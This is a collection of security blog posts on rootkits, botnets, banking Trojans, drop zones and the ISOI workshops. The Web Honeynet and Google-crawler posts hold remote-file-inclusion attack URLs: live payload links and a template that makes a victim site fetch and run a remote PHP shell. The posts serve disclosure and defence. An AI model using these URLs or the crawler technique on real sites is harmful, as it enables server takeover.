Cisco has released an updated version of its Cisco Security Response: Rootkits on Cisco IOS Devices document after the EuSecWest presentation of Mr. Sebastian Muniz (Core Security).

Hardening, best practices etc, it appears.

Thanks Gadi E. for pointing this on mailing lists.

Prevx Blog has a good writeup located at prevx.com/blog/75/Master-Boot-Record-Rootkit…

SANS Internet Storm Center has released an interesting timeline story - link here.

From the post based to Verisign iDefense data:

….

• Oct. 30, 2007 - Original version of MBR rootkit written and tested by attackers
• Dec. 12, 2007 – First known attacks installing MBR code
  about 1,800 users infected in four days.

McAfee detects the Trojan as StealthMBR (DAT 5204 or above) and Symantec as Trojan.Mebroot. Sophos uses name Troj/Mbroot-A, in turn. There are names like Trojan.Win32.Agent.dsj and TROJ_AGENT.APA assigned too.

10th Jan: Trend Micro uses the name TROJ_SINOWAL.AD
12th Jan: Symantec sees the infected MBR as Boot.Mebroot. McAfee uses the name StealthMBR!rootkit too.

New information is available related to the rootkit issue of Sony MicroVault USB sticks including fingerprint reader.

One of the stories is this Computer Weekly article which states:

A Sony spokesperson said: “While relatively small numbers of these models were sold, we are taking the matter seriously and conducting an internal investigation. No customers have reported problems related to situation to date.”

And earlier, F-Secure’s Mikko Hyppönen has reported that this issue has a lot of reasons which make it less serious than Sony BMG’s XCP issue was.

This report of F-Secure’s Mika Ståhlberg states that MicroVault USM-F fingerprint reader software shipped with that Sony USB stick installs a driver that is hiding a directory under C:\Windows.

And - reportedly the guys of FS research laboratory

also tested the latest software version available from Sony at www.sony.net/Products/Media/Microvault/ and this version also contains the same hiding functionality. [added a hyperlink]

Hmmm - time to wear my white T-shirt with text familiar to many readers - “Most people don’t even know what a rootkit is, so why should they care about it?”

Following up on that strange title, ISOI 3 (Internet Security Operations and Intelligence), a workshop for do-ers who work on the security of the Internet and its users, is happening Monday and Tuesday in Washington, DC.

This time around we have even more government participation (we’re in DC, duh), but a bit less from academia (who can try and look at long term solutions), rather than just us security researchers, and operators (who respond, contain and mitigate incidents).

I am very pleased with our progress on encouraging global cooperation, and getting more industry information sharing going. I am also happy we are moving from “just” good-will based relationships to the physical world with our efforts, being able to take things to the next level with world-wide operational task forces and, indeed, affecting change.

If you are interested in this realm of Internet security operations, take a look at ISOI 3’s schedule, and perhaps submit something for the next workshop.

Some reporters are somewhat annoyed that entrance is barred to them, but I hope they’d understand that although we make things public whenever we can as full disclosure is a strong weapon in the fight against cyber crime, folks can not share as openly when they have to be on their toes all the time.

The third ISOI is here because after DHS ended up unable to host it, sponsors emerged who were happy to assist:

Afilias Ltd.: http://www.afilias.info/
ICANN: http://www.icann.org/
The Internet Society: http://www.isoc.org/
Shinkuro, Inc.: http://www.shinkuro.com/

It’s going to be an interesting next week here at the swamp. Atendees better show up with their two forms of ID.

Gadi Evron,
ge@linuxbox.org.

CFP: ISOI III (a DA workshop)
=============================

Introduction
————

CFP information and current speakers below.

ISOI 3 (Internet Security Operations and Intelligence) will be held in
Washington DC this August the 27th, 28th.

This time around the folks at US-CERT (Department of Homeland Security -
DHS) are hosting. Sunbelt Software is running the after-party dinner.

We only have a partial agenda at this time (see below), but to remind you of what you will see, here are the previous ones:
http://isotf.org/isoi2.html
http://isotf.org/isoi.html

If you haven’t RSVP’d yet, please do so soon. Although we have 240 seats, we are running out of space.

A web page for ISOI 3 can be found at: http://isotf.org/isoi3.html

Details
——-
27th, 28th August, 2007
Washington DC -
AED conference center:
http://www.aedconferencecenter.org/main/html/main.html

Registration via contact@isotf.org is mandatory, no cost attached to attending. Check if you apply for a seat in our web page.

CFP
—

This is the official CFP for ISOI 3. Main subjects include: fastflux, fraud, DDoS, botnets. Other subjects relating to Internet security operations are also welcome.

Some of our current speakers as you can see below lecture on anything from Estonia’s “war” to current web 2.0 threats in-the-wild.

Please email contact@isotf.org as soon as possible to submit a proposal. I will gather them and give them to our committee (Jeff Moss) for review.

Current speakers (before committee decision)
——————————————–

Roger Thompson (Exp Labs
- Google adwords .. .the dangers of dealing with the Russian mafia

Barry Raveendran Greene (Cisco)
- What you should be asking me as a routing vendor

John LaCour (Mark Monitor)
- Vulnerabilities used to hack sites for phishing
- Using XSS to track phishers

Dan Hubbard (Websense)
- Mpack and Honeyjax (Web 2.0 honeypots)

April Lorenzen
- Fastflux: Operational Update

William Salusky (AOL)
- The Spammer Evolves - Migration to WebMail

Hillar Aarelaid (Estonian CERT)
- Incident Response during the Recent Attack

Gadi Evron (Beyond Security)
- Strategic Lessons from the Estonian “First Internet War”

Jose Nazarijo (Arbor)
- Botnet statistics from the Estonian attack

Andrew Fried (Treasury Department)
- Phishing and the IRS - New Methods

Danny McPherson (Arbor)
- TBA

In a post by Brian Krebs in the Washington post, Brian describes how Virus (malware) makers have started to spend cash on buying sponsored links of high-profile keywords which get regularly visited by poorly patched people so that they can infect them with malwares.

One such high-profile keyword is the BBB, the Better Business Bureau, which as you would guess it most average joes would go to visit and will look for, while buying something like Slashdot won’t .

This of course is an interesting move, though not so much unexpected. I can see an “legit-company” coming soon, where a company of such malware distribution will have an R&D - create new malwares and find new vulnerabilities, Marketing - buy high profile keywords, or generally get people interested in your malware infected web site and Sales - sell bot nets and infected/hacked computers for money type of organizations.

SecureWorks have posted analysis of another Trojan that used to to steal SSL/TLS encrypted data transfered from the victimized PC.

A single attack by a single variant compromises more than 5200 hosts and 10,000 user accounts on hundreds of sites.

• Steals SSL data using advanced Winsock2 functionality
• State-of-the-art, modularized Trojan code
• Spread through IE browser exploits
• Undetected for weeks, months by many AV vendors
• Customized server/database code to collect sensitive data
• Customer interface for on-line purchases of stolen data
• Accounts compromised by stealing data primarily from infected home PCs
• Accounts at top financial, retail, health care, and government services affected
• Data’s black market value at least $2 million

Full article is here.

Austrian AV Comparatives Web site tested 17 AV products - including several free anti-virus programs as well.
Link to the test: www.av-comparatives.org/
(select ‘Comparatives’ and ‘On-demand comparative / February 2007′)

Microsoft’s Live OneCare was the only product receiving result under ‘Standard’ level and it detected only 82.4 percent of malware. There are many well known vendors with the result of 97.9 percent. And the winner received the result of 99.5 %.
OneCare’s detection of polymorphic viruses was poor as well, says the report.

This is not the only coverage test published, but AV Comparatives will release more similar tests later this year. We will see if the result will change.

Important note: the name of the Web Honeynet Project has been changed to the Web Honeynet Task Force to avoid confusion with the Honeynet Project.

[ Warning: this post includes links to live web server malware propagated this Wednesday via file inclusions exploits. These links are not safe! ]

Hello.

The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will in the next few months announce research on real-world web server attacks which infect web servers with:
Tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

The Web Honeynet Project will, for now, not deal with the regular SQL injection and XSS attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

These attacks form botnets constructed from web servers (mainly IIS and Apache on Linux and Windows servers) and transform hosting farms/colos to attackplatforms.

Most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) PHP web applications, as is well known and established.

PHP (or scripting) shells, etc. have been known for a while, as well as file inclusion (or RFI) attacks, however, mostly as something secondary and not much (if any - save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

The bad guys currently exploit, create botnets and deface in a massive fashion and force ISPs and colos to combat an impossible situation where any (mainly) PHP application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

What is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) - meaning aside for research, the Web Honeynet Project will also release actionable data on offensive IP addresses, URLs and on the tools themselves to be made availableto operational folks, so that they can mitigate the threat.

It’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. Several folks (andquite loudly - me) have been warning about this for a while, now it’s time to take action instead of talk.

Note: Below you can find sample statistics on some of the Web Honeynet Project information for this last Wednesday, on file inclusion attacks seeding malware.
You will likely notice most of these have been taken care of by now.

The first research on the subject (after looking into several hundred such tools) will be made public on the February edition of the Virus Bulletin magazine, from:
Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).

The SecuriTeam and ISOTF Web Honeynet Project is supported by Beyond Security ( http://www.beyondsecurity.com )..

Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the new members of the project.

For more information on the Web Honeynet Project feel free to contact me.

Also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

Sample report and statistics (for Wednesday the 10th of January, 2007):

IP | Hit Count | Malware (Count), … |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)

In this post ( http://www.phenoelit.net/lablog/Irresponsible.sl ), FX describes a drop zone for a phishing/banking trojan horse, and how he got to it.

Go FX. I will refrain from commenting on the report he describes from secure science, which I guess is a comment on its own.

We had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public).

Once with a very large “security intelligence” company giving drop zone data in a marketing attempt to get more bank clients (”hey buddy, why are 400 banks surfing to our drop zone?!?!)

Twice with a guy at defcon showing a live drop zone, and the data analysis for it, asking for it to be taken down (it wasn’t until a week later during the same lecture at the first ISOI workshop hosted by Cisco). For this guy’s defense though, he was sharing information. In a time where nearly no one was aware of drop zones even though they have been happening for years, he shared data which was valuable commercially, openly, and allowed others to clue up on the threats.

Did anyone ever consider this is an intelligence source, and take down not being exactly the smartest move?

It’s enough that the good guys all fight over the same information, and even the most experienced security professionals make mistakes that cost in millions of USD daily, but publishing drop zone IPs publicly? That can only result in a lost intelligence source and the next one being, say, not so available.

I believe in public information and the harm of over-secrecy, I am however a very strong believer that some things are secrets for a reason. What can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries.

At least we have responsible folks like FX around to take care of things when others screw up.

I got tired of being the bad guy calling “the king is naked”, at least in this case we can blame FX.

It’s an intelligence war people, and it is high time we got our act together.

I will raise this subject at the next ISOI workshop hosted by Microsoft
( http://isotf.org/isoi2.html ) and see what bright ideas we come up with.

Gadi Evron,
ge@linuxbox.org.

A few months back I released a post on where I think anti-botnets technology is heading. Now it’s time for what happened in 2006, and what we can expect from here on.

I am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. This is why I will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

What changed with botnets in 2006:

1.Botnets reached a level where it is unclear today what parts of the Internet are not compromised to an extent. Count by clean rather than infected.
2. Botnets have become the most significant platform from which virtually any type of online attack and crime are launched. Botnets equal an online infrastructure for abusive or criminal activity online.
3. In the past year, botnets have become mainstream. From a not existent field even in the professional realm up to a few years ago, where attacks were happening constantly reagrdless, it has turned to the main buzzword and occupation of the security industry today, directly and indirectly.
4. Websites have returned to being one the most significant form of infection for building botnets, which hadn’t been the case since the late 90s.
5. Botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. New technologies are finally being introduced, moving the botnet controllers from using just (or mainly) IRC to more advanced C&C (command and control) channels such as P2P, or multi-layered, such as DNS and IRC on the OSI model.
7. Botnets used to be a game of quantity. Today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

What’s going to happen with botnets in 2007:

Botnets won’t change. All will remain the same as it has been for years. Awareness however, will increase making the problem appear larger and larger, perhaps approaching its real scale. The bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash. Maximizing their revenue.

Further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shame-less and open show of strength to those who oppose them (think Blue Security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).

Meaning, the existing botnets infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as quiet and secretive uses for third-party intelligence operations.

Gadi Evron,
ge@linuxbox.org.

ISOI 2 is finalized. The schedule and agenda can be found here:
http://isotf.org/isoi2.html

I am going to do my best to release some of these presentation publically after the event (if the authors agree), but it is not likely.

Some public feedback will be relayed from the workshop.

Gadi Evron,
ge@linuxbox.org.

Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of “Google hacking”, although that is how most of the sites vulnerable to RFI attacks are found).

By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.

PoC -
A malicious web page is constructed by an attacker, containing a URL built like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.

Example URL:
http://victim-site/RFI-exploit?http://URI-with-malicious-code.php

Google will harvest this URL, visit the site using its crawler and index it.
Meaning accessing the target site with the URL it was provided and exploiting it unwittingly for whoever planted it. It’s a feature, not a bug.

This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif

And note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
Which is no longer vulnerable. The %20 seems out of place, but this is how it is shown in the search.

Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?

Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.

Noam Rathaus.
(with thanks to Gadi Evron and Lev Toger)

As can be seen in the quoted message below –

So, here we go. Real-life uses for vulnerabilities.

Below is an example of just ONE “drop-zone” server in the United States, which has “600 financial companies and banks”.

Several gigs of data.

How do these things work?
(more…)